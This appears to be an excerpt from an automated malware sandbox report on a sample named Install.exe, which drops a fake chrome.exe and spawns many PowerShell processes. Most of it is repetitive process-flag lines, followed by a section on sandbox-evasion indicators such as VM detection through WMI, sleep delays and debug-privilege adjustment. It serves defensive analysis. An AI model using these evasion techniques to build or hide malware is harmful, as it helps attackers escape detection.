Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972Thread sleep time: -68000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 5547 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep count: 3401 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep count: 5587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772Thread sleep count: 2582 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 480Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5547
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2582
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1048
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\lsass.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 3.2 %
Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Install.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040290B FindFirstFileW,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400090E0 GetProcessHeap,
Source: C:\Users\user\AppData\Roaming\34432.exeProcess token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: page read and write | page guard
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,
